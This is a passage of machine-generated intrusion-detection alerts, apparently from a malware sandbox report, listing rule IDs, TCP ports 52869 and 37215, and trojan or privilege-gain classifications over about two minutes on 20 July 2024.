                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.053348
                      SID:2027339
                      Source Port:48152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.241196
                      SID:2831300
                      Source Port:60242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:14.686790
                      SID:2027339
                      Source Port:35484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222279
                      SID:2835222
                      Source Port:47332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.095115
                      SID:2025132
                      Source Port:35686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.833522
                      SID:2027339
                      Source Port:48236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.944007
                      SID:2027339
                      Source Port:60766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.210612
                      SID:2027339
                      Source Port:59372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.090403
                      SID:2025132
                      Source Port:36694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.585790
                      SID:2027339
                      Source Port:53264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.580798
                      SID:2027339
                      Source Port:44132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.965873
                      SID:2025132
                      Source Port:51534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.751559
                      SID:2027339
                      Source Port:43492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.327808
                      SID:2027339
                      Source Port:46250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.735394
                      SID:2027339
                      Source Port:44298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2829579
                      Source Port:54922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.601040
                      SID:2025132
                      Source Port:57016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.249115
                      SID:2025132
                      Source Port:40794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.991548
                      SID:2829579
                      Source Port:57218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.719940
                      SID:2027339
                      Source Port:37788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.173843
                      SID:2027339
                      Source Port:48376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.111381
                      SID:2835222
                      Source Port:60172
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.975107
                      SID:2829579
                      Source Port:50162
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.060731
                      SID:2829579
                      Source Port:60036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.906354
                      SID:2831300
                      Source Port:40552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.497526
                      SID:2027339
                      Source Port:55536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.418920
                      SID:2027339
                      Source Port:56400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2829579
                      Source Port:51914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.288086
                      SID:2025132
                      Source Port:57260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.322055
                      SID:2027339
                      Source Port:53270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082384
                      SID:2829579
                      Source Port:57400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.972649
                      SID:2025132
                      Source Port:47400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.597662
                      SID:2027339
                      Source Port:55010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322110
                      SID:2027339
                      Source Port:44766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.271651
                      SID:2027339
                      Source Port:60772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.869521
                      SID:2027339
                      Source Port:56828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.285243
                      SID:2027339
                      Source Port:47850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.819962
                      SID:2025132
                      Source Port:49936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:09.027075
                      SID:2027339
                      Source Port:32880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.674251
                      SID:2831300
                      Source Port:49456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2835222
                      Source Port:56250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.985732
                      SID:2831300
                      Source Port:41786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2835222
                      Source Port:44260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.183470
                      SID:2025132
                      Source Port:59044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.630327
                      SID:2027339
                      Source Port:34078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221248
                      SID:2829579
                      Source Port:38000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.441271
                      SID:2027339
                      Source Port:46226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.277250
                      SID:2027339
                      Source Port:43864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.061779
                      SID:2835222
                      Source Port:59324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.693711
                      SID:2831300
                      Source Port:58450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221145
                      SID:2829579
                      Source Port:56886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.482793
                      SID:2025132
                      Source Port:42058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:08.206268
                      SID:2027339
                      Source Port:53034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2835222
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.296959
                      SID:2831300
                      Source Port:49948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.158278
                      SID:2835222
                      Source Port:33262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.676253
                      SID:2831300
                      Source Port:58742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.212550
                      SID:2027339
                      Source Port:40964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.238000
                      SID:2027339
                      Source Port:52642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.728248
                      SID:2027339
                      Source Port:37248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2829579
                      Source Port:48814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.834295
                      SID:2025132
                      Source Port:58622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.692028
                      SID:2831300
                      Source Port:57984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.102525
                      SID:2027339
                      Source Port:36072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.955750
                      SID:2027339
                      Source Port:60080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.791090
                      SID:2025132
                      Source Port:47260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2835222
                      Source Port:39010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.629615
                      SID:2027339
                      Source Port:59098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.294006
                      SID:2027339
                      Source Port:37108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.101588
                      SID:2831300
                      Source Port:53848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.484813
                      SID:2027339
                      Source Port:41322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.993925
                      SID:2831300
                      Source Port:59994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.938818
                      SID:2829579
                      Source Port:37944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.328855
                      SID:2027339
                      Source Port:53888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.596580
                      SID:2025132
                      Source Port:38116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:05.835826
                      SID:2027339
                      Source Port:48206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.483452
                      SID:2831300
                      Source Port:40680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.962852
                      SID:2025132
                      Source Port:34886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.729310
                      SID:2831300
                      Source Port:48676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.595913
                      SID:2025132
                      Source Port:52276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.688552
                      SID:2027339
                      Source Port:37880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.758923
                      SID:2027339
                      Source Port:58628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222163
                      SID:2835222
                      Source Port:43440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.468208
                      SID:2027339
                      Source Port:50766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110860
                      SID:2829579
                      Source Port:40532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.730585
                      SID:2835222
                      Source Port:52710
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221017
                      SID:2829579
                      Source Port:34536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.485253
                      SID:2027339
                      Source Port:50448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2835222
                      Source Port:57304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.343151
                      SID:2829579
                      Source Port:39838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.945183
                      SID:2027339
                      Source Port:33778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.146232
                      SID:2829579
                      Source Port:45252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.725851
                      SID:2829579
                      Source Port:40854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.841155
                      SID:2027339
                      Source Port:47910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.109958
                      SID:2025132
                      Source Port:51562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.380019
                      SID:2027339
                      Source Port:49674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.010169
                      SID:2027339
                      Source Port:36492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.519318
                      SID:2025132
                      Source Port:53592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.392835
                      SID:2831300
                      Source Port:36384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.732056
                      SID:2027339
                      Source Port:49360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.569791
                      SID:2025132
                      Source Port:52506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2835222
                      Source Port:54968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:37.123706
                      SID:2025132
                      Source Port:42692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2835222
                      Source Port:49292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2829579
                      Source Port:49836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.693537
                      SID:2027339
                      Source Port:44936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.459025
                      SID:2027339
                      Source Port:42738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:03.032025
                      SID:2025132
                      Source Port:58854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.813695
                      SID:2831300
                      Source Port:36740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.665550
                      SID:2831300
                      Source Port:60378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2835222
                      Source Port:37082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.093903
                      SID:2829579
                      Source Port:49164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.154068
                      SID:2829579
                      Source Port:43252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.252201
                      SID:2027339
                      Source Port:33870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132511
                      SID:2835222
                      Source Port:47906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.332211
                      SID:2025132
                      Source Port:51470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.491060
                      SID:2025132
                      Source Port:48520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2835222
                      Source Port:48528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334934
                      SID:2829579
                      Source Port:52590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.775082
                      SID:2831300
                      Source Port:55078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.940318
                      SID:2027339
                      Source Port:46312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.289412
                      SID:2027339
                      Source Port:59166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.187360
                      SID:2831300
                      Source Port:38882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2835222
                      Source Port:57406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.706302
                      SID:2831300
                      Source Port:38048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.098080
                      SID:2829579
                      Source Port:33920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.318262
                      SID:2025132
                      Source Port:44880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.314147
                      SID:2831300
                      Source Port:47166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.511523
                      SID:2831300
                      Source Port:49878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.943232
                      SID:2831300
                      Source Port:50526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.462339
                      SID:2025132
                      Source Port:41534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.572556
                      SID:2027339
                      Source Port:44650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.320338
                      SID:2027339
                      Source Port:41898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2835222
                      Source Port:48176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.020186
                      SID:2027339
                      Source Port:40860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631549
                      SID:2829579
                      Source Port:35868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.725851
                      SID:2835222
                      Source Port:57548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322288
                      SID:2027339
                      Source Port:34440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:14.779973
                      SID:2025132
                      Source Port:52536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.286497
                      SID:2025132
                      Source Port:34874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.378726
                      SID:2027339
                      Source Port:40432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043784
                      SID:2835222
                      Source Port:57248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221338
                      SID:2829579
                      Source Port:59124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2835222
                      Source Port:58398
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.111275
                      SID:2027339
                      Source Port:54216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221803
                      SID:2829579
                      Source Port:36746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2835222
                      Source Port:59924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2829579
                      Source Port:41766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.951862
                      SID:2027339
                      Source Port:60714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.069088
                      SID:2027339
                      Source Port:40866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222129
                      SID:2829579
                      Source Port:40802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.443693
                      SID:2025132
                      Source Port:48548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2835222
                      Source Port:55088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816101
                      SID:2829579
                      Source Port:57656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593003
                      SID:2831300
                      Source Port:44018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.098209
                      SID:2829579
                      Source Port:37260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.963815
                      SID:2025132
                      Source Port:58050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.320338
                      SID:2831300
                      Source Port:57134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.820390
                      SID:2025132
                      Source Port:54914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.417573
                      SID:2025132
                      Source Port:48124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.474436
                      SID:2027339
                      Source Port:54350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.600303
                      SID:2027339
                      Source Port:51466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.449742
                      SID:2025132
                      Source Port:43924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.159758
                      SID:2027339
                      Source Port:44832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.836373
                      SID:2027339
                      Source Port:33954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.807585
                      SID:2831300
                      Source Port:42052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.367078
                      SID:2025132
                      Source Port:48042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.078068
                      SID:2027339
                      Source Port:46562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.735607
                      SID:2831300
                      Source Port:39890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.414030
                      SID:2027339
                      Source Port:56814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2829579
                      Source Port:35414
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.862410
                      SID:2829579
                      Source Port:44920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132511
                      SID:2829579
                      Source Port:51462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2829579
                      Source Port:46354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.107973
                      SID:2831300
                      Source Port:45408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.974837
                      SID:2835222
                      Source Port:37210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.582295
                      SID:2027339
                      Source Port:37508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.349275
                      SID:2835222
                      Source Port:55334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.938491
                      SID:2025132
                      Source Port:41506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.664606
                      SID:2835222
                      Source Port:51336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
